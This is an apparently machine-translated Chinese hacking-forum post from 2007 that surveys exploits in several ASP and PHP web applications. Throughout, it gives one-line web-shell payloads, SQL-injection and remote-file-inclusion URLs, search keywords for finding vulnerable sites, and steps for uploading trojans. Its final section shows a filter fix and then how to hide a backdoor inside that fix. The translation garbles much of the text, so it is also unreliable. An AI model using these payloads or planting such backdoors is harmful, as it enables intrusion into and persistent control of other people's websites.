Common Vulnerabilities and using a method and repair program Summary BY Alang-vulnerability warning-the black bar safety net

ID MYHACK58:62200715519
Type myhack58
Reporter 佚名
Modified 2007-05-20T00:00:00


Common Vulnerabilities and using a method and repair program Summary BY Alang 1. Dust the edge of the ya border graphic systems v3. 0 build 2 0 0 3 0 1 2 3 in in v0. 4 5 You can also. Vulnerability page: createasp. asp and lastnewsxp. asp By injecting landing background, published an article in the article title and content is there to fill in on our word<%execute request("value")%> Then execute the url/admin/createasp. asp return to normal, prompting the asp call success url/admin/createasp. asp returns an error, we inserted a horse of course. Bug fixes: I do not know how to repair~~the official has made a patch.~~

There are boiling 3AS stray dust edge news system v0. 4 5 Finish the full version there injection vulnerability, but this injection vulnerability to be a registered user to access! So if you turned off user registration is not folded~~~ Application method: direct registration of a user, and then casually in the home looking for a article write down his id, and then access http://XXXX. XXXX. com/textbox. asp? action=modify&newsid=just Only write down the id number! This page is with an injection vulnerabilities, it is easy to manually guess the solution! Obtained account and password into the background in the website configuration information, the message of the shield the words written on the“word” Then connect the http://website/inc/config. asp,then the shell got it! Then use the word client connections http://url/admin/createasp. asp Bug fixes: textbox. asp in the code 1 4-3 0 line <% Dim action,newsID,rs,Content dim sql dim conn Action=LCase(Request. QueryString("Action")) newsID=Request. QueryString("newsID")

If request("action")="modify" Then set rs=server. createobject("adodb. recordset") sql="select * from news where newsid="&newsid rs. open sql,conn,1,1 If Not rs. Eof Then Content=rs("Content") End If Response. Write Content End If %> The increase of a filtering statement is ok, put those file extension filtering on ok~~~~I will not say more, saying I did not learn asp comparisons are not familiar with 2. The old vulnerability/user/Upload. asp? dialogtype=UserBlogPic&size=5, but there are a lot of unpatched) In Baidu in advanced search search don't forget the point UL in the Reg/User_Reg. asp-the registration interface to register a***. asp format of the user name Then find a can upload images of the point, the picture insert code word Trojan code is inserted, find an empty row empty position to insert the code<%eval request("Sony")%> With the word client connection Oh! 3. Love Dating system upload vulnerability Vulnerability file/admin/upload_file. asp and dynamic web upfile. asp exploits the same principle Ferry search keywords:city Dating greeting card teaser emotional ramblings of the popular vote The first detection of the following vulnerabilities exist: http://website/admin/upload_file.asp returns show: Microsoft VBScript runtime error-Error '800a01b6'

Object doesn't support this property or method: 'form'

/admin/upload_file. asp, line 6 Description a vulnerability exists! Next to Ming the kid is ok, pass on the horse~~~~ 4. Sky classroom network classroom upload vulnerability, still a lot more (1). Open Baidu, enter the keyword: sky classroom network classroom

(2). Add vulnerability file: htmleditor/getfile. asp is not filtered. asa so you want to put the horse into the asa.

Upload address: http://website/skyclass/htmleditor/getfile.asp the first open WSockExpert capture, and then transfer the horse from WSockExpert give back address. 5. SHOPEX latest exploit The vulnerability appears in the /shop/npsout_reply.php and the remote contains almost Baidu search:

Keywords: product catalog contact us about us frequently asked questions secure transaction buying process how to pay Yourself first get a PHP Horse the suffix changed to. TXT to upload to the space 目标 网址 后面 加上 /shop/npsout_reply.php?INC_SYSHOMEDIR= = 是 我 空间 自己 传 上去 的 马 it! Bug fixes: you can delete the shop directory under the npsout_reply. php file 6. The mine pool system upload vulnerability For the previous version, there is a loophole'or'='or'background vulnerability, and now the latest version does not have this vulnerability, try the following download the default database data/nxnews. mdb password in plaintext stored The But this upload vulnerability suitable for use in any version background address: admin/adminlogin. asp first look 'or'='or'background vulnerability In the URL after admin/uploadPic. asp? actionType=mod&picName=x. asp wherein x. asp is a shell file name Select a Trojan horse picture,and then press the upload can be uppic directory where the uploaded file is named x. the asp File connection address http://website/uppic/x. asp So you get to shell out~~~ In fact, in the admin folder under uploadPic. inc. asp, no access restrictions, any user can access to this file. Any user can use this file to upload the file to the server Bug fixes the first description of an asp syntax replace(str,"a","b") This function is the string str in all of a is converted into b Then we look at just the Submit function picName=x. asp picName is submitted to the variable x. asp is it to submit data We have to do is replace the inside. asp what Well, we can write this replace(picName,". asp",". gif") 这个 函数 是 将 字符串 picName 中的 所有 .asp 转换 成 .gif Only replace the. asp no, there is. asa? replace(replace(picName,". asp",". gif"),". asa",". gif") Well, look at me,the other is also thus modified replace(replace(replace(picName,". asp",". gif"),". asa",". gif"),". cer",". gif") Then replace one. cdx replace(replace(replace(replace(picName,". asp",". gif"),". asa",". gif"),". cer",". gif"),". cdx",". gif") Then replace% replace(replace(replace(replace(replace(picName,". asp",". gif"),". asa",". gif"),". cer",". gif"),". cdx",". gif"),"%","") Well, this is what we want to the code. uploadPic. inc. asp modify this file First see below, no x. asp this file. Well, as you can see, below we add the own code So how can we leave yourself a back door? Good, also very simple And then to sentence the asp if request("act")<>"shell" then picName = replace(replace(replace(replace(replace(picName,". asp",". gif"),". asa",". gif"),". cer",". gif"),". cdx",". gif"),"%","") end if This phase code mean if you submitted the parameters of the act's content is not a shell, then it would perform inside the content, which fruit is that the shell does not perform inside the content is good, we will have just the code plus This sentence is we just added and then the above statement is added to the original plus the place to go Well, we'll see if I can upload 这里 还是 x.gif below we add a parameter according to the look http://loaclhost/admin/uploadPic_bak.asp?act=shell&actionType=mod&picName=x. asp Since we can no longer multi-parameters, then we can use the parameters of the well picName=x. asp this parameter can be used. if picName<>"wolf. asp" picName = replace(replace(replace(replace(replace(picName,". asp",". gif"),". asa",". gif"),". cer",". gif"),". cdx",". gif"),"%","") end if The above is just the code,below I modified the following Here, we just submit the data http://localhost/admin/uploadPic_bak.asp?actionType=mod&picName=wolf. asp In order to get asp shell, and below we'll take a look The first replacement code, We first submitted this, look at the generated isWhat? http://localhost/admin/uploadPic_bak.asp?actionType=mod&picName=x. asp Is the picture, and then to submit this http://localhost/admin/uploadPic_bak.asp?actionType=mod&picName=wolf. asp It will generate a wolf. asp file So we can simple be a lower vulnerability and can make a simple back door~~~